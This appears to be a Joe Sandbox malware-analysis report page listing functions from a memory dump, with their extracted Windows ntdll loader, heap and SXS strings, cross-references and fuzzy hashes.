Instruction ID: 23b23b9de623d20c386e6890c4f39f98deda043d8bd214e75d51ee16ad405cb6
Opcode Fuzzy Hash: 9cf62d752fe8bc31fbd13e36b849e5037825aeffbb886f6e38886ff5f6aecbad
Instruction Fuzzy Hash: 03929F71604346AFEB25DE28C890BABB7E8BF84754F04492DFAD4D7290D770E844DB92

Function 01048620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010854E2
undeleted critical section in freed memory, xrefs: 0108542B
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0108540A, 01085496, 01085519
Critical section address, xrefs: 01085425, 010854BC, 01085534
Thread is in a state in which it cannot own a critical section, xrefs: 01085543
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010854CE
Address of the debug info found in the active list., xrefs: 010854AE, 010854FA
Critical section debug info address, xrefs: 0108541F, 0108552E
8, xrefs: 010852E3
Invalid debug info address of this critical section, xrefs: 010854B6
corrupted critical section, xrefs: 010854C2
double initialized or corrupted critical section, xrefs: 01085508
Critical section address., xrefs: 01085502
Thread identifier, xrefs: 0108553A

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 44fdcd36553f298d823573d6a30007fb1f5489c46fd7746497f83b6efd52fb8c
Instruction ID: 5fb72dc33cf5564258d64d438d95af4cd63355e6d8a01fc63facbb3b368e7451
Opcode Fuzzy Hash: 44fdcd36553f298d823573d6a30007fb1f5489c46fd7746497f83b6efd52fb8c
Instruction Fuzzy Hash: F581AEB1A04349AFDB61DF99CC40BAEBBF5BF08B14F108159F684B7290D7B1A941DB60

Function 010429F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

RtlpResolveAssemblyStorageMapEntry, xrefs: 0108261F
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01082624
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010822E4
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01082498
@, xrefs: 0108259B
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01082506
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010824C0
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01082602
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01082412
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01082409
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010825EB

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: b6cb45fcc087b59f753e08c401ad3b789d45d957eec520545351fbfe32d38b12
Instruction ID: e47ff706b8a75c50d3f38e7557fc8c02843b22455a18a3b96fa30ce760a0aa08
Opcode Fuzzy Hash: b6cb45fcc087b59f753e08c401ad3b789d45d957eec520545351fbfe32d38b12
Instruction Fuzzy Hash: 7A0240F1D0422D9BDB61DB54CD80BEEB7B8AF54304F4041EAA689A7241DB709E84CF69

Function 010B8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 010B8BD0
smss.exe, xrefs: 010B8B8B
svchost.exe, xrefs: 010B8B68
runtimebroker.exe, xrefs: 010B8B73
SegmentHeap, xrefs: 010B8BE9
heapType, xrefs: 010B8BCB
lsass.exe, xrefs: 010B8BA1
services.exe, xrefs: 010B8B96
DefaultBrowser_NOPUBLISHERID, xrefs: 010B8D00
csrss.exe, xrefs: 010B8B80

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 79694b89eb72eff230e6f6e82c56132cbe0082a91ced76b9a60724137c9b119e
Instruction ID: c4ff00c2bf77adb9137d6e194a66e92faadfd885de5dd8e3da4816ba9e81b2df
Opcode Fuzzy Hash: 79694b89eb72eff230e6f6e82c56132cbe0082a91ced76b9a60724137c9b119e
Instruction Fuzzy Hash: E951B1B15083469BD325EF198888BEBBBECEF94740F14891FA9D8C3251E770D604CB92

Function 0102AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrapi.c, xrefs: 01078086, 010783BC
LdrpFindLoadedDllInternal, xrefs: 010782D7
LdrpInitializeDllPath, xrefs: 010780AD
DLL name: %wZ, xrefs: 01078075
minkernel\ntdll\ldrutil.c, xrefs: 010780B7
DLL search path passed in externally: %ws, xrefs: 010780A6
minkernel\ntdll\ldrfind.c, xrefs: 010782E1
Status: 0x%08lx, xrefs: 010782D0, 010783AB
LdrGetDllHandleEx, xrefs: 0107807C, 010783B2

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 627618d6b9e441e5b23645cdf7cbb4ecf68e418de8a901f0fd4b97882a23612d
Instruction ID: bbfb40b15e932c023de57e43e9412e54164e2fc941e47e395f823400469e7f38
Opcode Fuzzy Hash: 627618d6b9e441e5b23645cdf7cbb4ecf68e418de8a901f0fd4b97882a23612d
Instruction Fuzzy Hash: 06121371A08362CFD765DF18C480BAAB7E4BF84704F04496EF9C58B291EB74D945CB92

Function 010989B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierDlls, xrefs: 01098CBD
AVRF: -*- final list of providers -*- , xrefs: 01098B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01098A3D
VerifierDebug, xrefs: 01098CA5
VerifierFlags, xrefs: 01098C50
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01098A67
HandleTraces, xrefs: 01098C8F

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: d809cab19edfb6093dd13ab9c25736be42435a71f2a96b741c3232c1586af019
Instruction ID: d67516393db5b90991ebad58abaeb8b720d7b577b5eca6ef36768f1138d3f52e
Opcode Fuzzy Hash: d809cab19edfb6093dd13ab9c25736be42435a71f2a96b741c3232c1586af019
Instruction Fuzzy Hash: A991597190534AEFDB26EF2888A0B5B77E5AF55714F04846AFAC06B391C7B0EC40DB91

Function 0101EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

, xrefs: 0101F299
{, xrefs: 01074643
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0101EB58
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0101EB6C
R, xrefs: 0101EB62
T, xrefs: 0101EB4E

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 8fbc9d523c556485fe83f817fa4d6603f7f74a79496fe338d2fd5b70db76ab10
Instruction ID: 8687a7e7377ecca482ead4cdfe979fa9efa4c5e209b8036748b6ab131496f3de
Opcode Fuzzy Hash: 8fbc9d523c556485fe83f817fa4d6603f7f74a79496fe338d2fd5b70db76ab10
Instruction Fuzzy Hash: 86A24870E0562A8BDBA5CF18CC88BADBBB5BF45304F1442E9D98DA7254DB349E85CF04

Function 010463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 01084258
_LdrpInitialize, xrefs: 010840DF, 01084141, 01084205, 0108425F
Process initialization failed with status 0x%08lx, xrefs: 0108413A
minkernel\ntdll\ldrinit.c, xrefs: 010840E9, 0108414B, 0108420F, 01084269
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 010841FE
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 010840D8

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 4c4a7537cc56724df4d3661e911f47f8474b677d4a0941a336d5455b5221ffa8
Instruction ID: 589a514ada8af8da34baca7e1b346c4689185d30843ee17ba0c2343a25147eda
Opcode Fuzzy Hash: 4c4a7537cc56724df4d3661e911f47f8474b677d4a0941a336d5455b5221ffa8
Instruction Fuzzy Hash: C6913A70F04316DBEF6AEF58D884BAE7BA1BF51B14F000179D5D0AB281EBB59441C791

Function 0100645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 01069A01
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010699ED
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01069A2A
apphelp.dll, xrefs: 01006496
LdrpInitShimEngine, xrefs: 010699F4, 01069A07, 01069A30
minkernel\ntdll\ldrinit.c, xrefs: 01069A11, 01069A3A

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 52ce86a9bc1f62c7be73c0033cee6ebe6bd789be5bb47cd1e9db501f68d58d5d
Instruction ID: c63017270b25ac036f868a5b30b027d539f86c76f5dd9e47d6968eda96de208c
Opcode Fuzzy Hash: 52ce86a9bc1f62c7be73c0033cee6ebe6bd789be5bb47cd1e9db501f68d58d5d
Instruction Fuzzy Hash: 5E51DF716183089FE726DF24C841AAF77E9FF84748F000929F6D59B1A0D771E944CB92

Function 01042674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01082178
SXS: %s() passed the empty activation context, xrefs: 01082165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01082180
RtlGetAssemblyStorageRoot, xrefs: 01082160, 0108219A, 010821BA
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010821BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0108219F

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: a84ad44a46dc2f73858fc8e6dc8c50ff5acc2677c94772ab9171baf4f0922b08
Instruction ID: 3796e51e00860c5eeba2729cd5e55dfe212cc2a7fa186ec0e3070dc6e25b9ee1
Opcode Fuzzy Hash: a84ad44a46dc2f73858fc8e6dc8c50ff5acc2677c94772ab9171baf4f0922b08
Instruction Fuzzy Hash: 68315B76B4031577EB21EA999C81F6E7E78EF64B90F1500A9BB80A7150D270DA00D2A1

Function 0104C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 010881E5
minkernel\ntdll\ldrredirect.c, xrefs: 01088181, 010881F5
LdrpInitializeProcess, xrefs: 0104C6C4
minkernel\ntdll\ldrinit.c, xrefs: 0104C6C3
LdrpInitializeImportRedirection, xrefs: 01088177, 010881EB
Loading import redirection DLL: '%wZ', xrefs: 01088170

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 7a9a7b622127485bff3b39f04be5990c961dfb5d26097b00d51abad21bc483bb
Instruction ID: 4d2401aa768cac4732c85b210f54c7a8a6576f3395d8286dd58fdda1d5c0044f
Opcode Fuzzy Hash: 7a9a7b622127485bff3b39f04be5990c961dfb5d26097b00d51abad21bc483bb
Instruction Fuzzy Hash: 353135B17487069FD324EF28D985E6AB7D9EFD4B10F044568F9C1AB290E620EC04C7A2

Function 0105096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01052DF0: LdrInitializeThunk.NTDLL ref: 01052DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050D74

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: c0e672b5bb815c73c9368ac0196c668ccf7acb1f2f2135a162802f3d9757bc91
Instruction ID: af13ca2e73372197752cc46fb49785df36411add57602c6ae039bd90898bddfb
Opcode Fuzzy Hash: c0e672b5bb815c73c9368ac0196c668ccf7acb1f2f2135a162802f3d9757bc91
Instruction Fuzzy Hash: F6425B75900715DFDBA1DF28C880BAAB7F4BF44314F1485A9E9C9EB245E770AA84CF60

Function 0101A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 0101A3F7
LdrResFallbackLangList Enter, xrefs: 0101A3EF
LdrResFallbackLangList Exit, xrefs: 0101A3FF
8, xrefs: 0101A3E7

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: c1dc5089b5375980c51080cd26135e5821a588c223b59154d92a98d0aa673cf5
Instruction ID: a0baacdf8f837fb9cb4c5dd3dd139919f50e9f2da5a77fab307b9e44d968a5a3
Opcode Fuzzy Hash: c1dc5089b5375980c51080cd26135e5821a588c223b59154d92a98d0aa673cf5
Instruction Fuzzy Hash: 61C1AD706093C6CFD711DF58C040BAAB7E4BF88704F04496AF9D58B259E738CA49CB56

Function 01048402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 01048591
minkernel\ntdll\ldrinit.c, xrefs: 01048421
LdrpInitializeProcess, xrefs: 01048422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0104855E

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 83fa70ab3e42e7a1d08d9f9a3600e27f41090105269e78063d36c8a2ef814f85
Instruction ID: 511c4af37a9c9cbf2d386762e73570cb8a46a9b72e9a0972c62dd86fd5777734
Opcode Fuzzy Hash: 83fa70ab3e42e7a1d08d9f9a3600e27f41090105269e78063d36c8a2ef814f85
Instruction Fuzzy Hash: 00916EB1508345AFEB61EE65CC80EABBAE8BF84744F404D3EFAC496151E734D9448B62

Function 0104273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 010821DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010822B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010821D9, 010822B1
.Local, xrefs: 010428D8

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 2b3d121b21b8be6d20b5d78754f55935952cdac387be62218cfeed5f0ad0c4ad
Instruction ID: 323ee6f63798258620a0f6657026ccf8a1fc2bde2d07c78fec6001e7e4370699
Opcode Fuzzy Hash: 2b3d121b21b8be6d20b5d78754f55935952cdac387be62218cfeed5f0ad0c4ad
Instruction Fuzzy Hash: D3A1D175A0422ADBDB64DF58EC84BA9B7B0BF58314F1541F9E988AB251D7309E80CF90

Function 01044AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid flags 0x%08lx, xrefs: 0108342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01083437
RtlDeactivateActivationContext, xrefs: 01083425, 01083432, 01083451
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01083456

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 7e0bfc4765e5d1fda9c278910fa080321fa589c310ab1a744bf1029676adbba5
Instruction ID: 5c102999bc9a9ac4b890564c2472b227493d90b300892cdd9a504ff818451338
Opcode Fuzzy Hash: 7e0bfc4765e5d1fda9c278910fa080321fa589c310ab1a744bf1029676adbba5
Instruction Fuzzy Hash: 47613572604B169BD762DF1CC881B2ABBE0BF80B10F1885A9E9D5DF251DB30E800CB95

Function 010164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01070FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0107106B
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010710AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01071028

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: ac97c3052e29f29633a27dcf5281714772a51aff80e5b4643c9e364c19e78184
Instruction ID: d7e564fe4d609a5a29dd48f7eb9c6f8bbd888a2de74d347a7244dfaa8640d264
Opcode Fuzzy Hash: ac97c3052e29f29633a27dcf5281714772a51aff80e5b4643c9e364c19e78184
Instruction Fuzzy Hash: 8671DFB19043059FCB61DF14CC84B9B7FE8AF55764F0004A9F9898B18AD779D588CBD2

Function 0103245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 0107A998
apphelp.dll, xrefs: 01032462
minkernel\ntdll\ldrinit.c, xrefs: 0107A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0107A992

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: d2512c5cc2549dbd43311f08445e2baf8b8408b31974c09021a63bc4424a29b9
Instruction ID: c5e1598189791b31e2148c9e7c79e6edc6f153eab5b0af7bba7a50963dcb0317
Opcode Fuzzy Hash: d2512c5cc2549dbd43311f08445e2baf8b8408b31974c09021a63bc4424a29b9
Instruction Fuzzy Hash: 38316A75F00201EBDB3A9F5CD880AAE77F4FB84710F19006AE9A067245CBF099D1C740

Function 010229A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0102327D
HEAP[%wZ]: , xrefs: 01023255
HEAP: , xrefs: 01023264

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 17956fb4fba118d3f9fe487084ee7b4a5e93ff42e38ba746848fb67a437a793f
Instruction ID: 5ba3116403c43f1572d4ae2150e4f3b81331c92041ebc16be7e52824dfe13e34
Opcode Fuzzy Hash: 17956fb4fba118d3f9fe487084ee7b4a5e93ff42e38ba746848fb67a437a793f
Instruction Fuzzy Hash: 9B92DF70A04269DFDB65CFA8C444BAEBBF1FF48300F1480A9E999AB351D739A941CF50

Function 01020770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 010750CA
HEAP[%wZ]: , xrefs: 010750AE
HEAP: , xrefs: 010750BD

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: c44fbe452cf9b86a92f889836e5aa95ce5d7980cd6984b3fbc1c021aaefd2120
Instruction ID: 4864bc5d46b621048e469de66749eafb6c0a5f277576951059993203282bca7a
Opcode Fuzzy Hash: c44fbe452cf9b86a92f889836e5aa95ce5d7980cd6984b3fbc1c021aaefd2120
Instruction Fuzzy Hash: BFF19A70B00616DFEB26CF68C884BAAB7F5FF45304F1481A8E5969B395D734E981CB90

Function 01036962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0107CA51
@, xrefs: 01036C24

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: fcb94c3ce3104de2931bfea124ad4b5c9b84698a97e6639621e1ebdc5e893c46
Instruction ID: 55846ee17ffa2715ced80e54982b56f3f6c4a52edad7215ba17fca56a80d9040
Opcode Fuzzy Hash: fcb94c3ce3104de2931bfea124ad4b5c9b84698a97e6639621e1ebdc5e893c46
Instruction Fuzzy Hash: BFC27DB1A083419FE765CF28C880BABBBE9AFC8714F04896DF9C987241D735D944CB52

Function 0100A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0106C1E4
UseFilter, xrefs: 0100A1C1
FilterFullPath, xrefs: 0106C2E6

Memory Dump Source

Source File: 00000003.00000002.2291982390.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fe0000_3qsTcL9MOT.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: b4cfa3a389c948a71442ac7111804643c319b367a59708b74459534c91fd355e
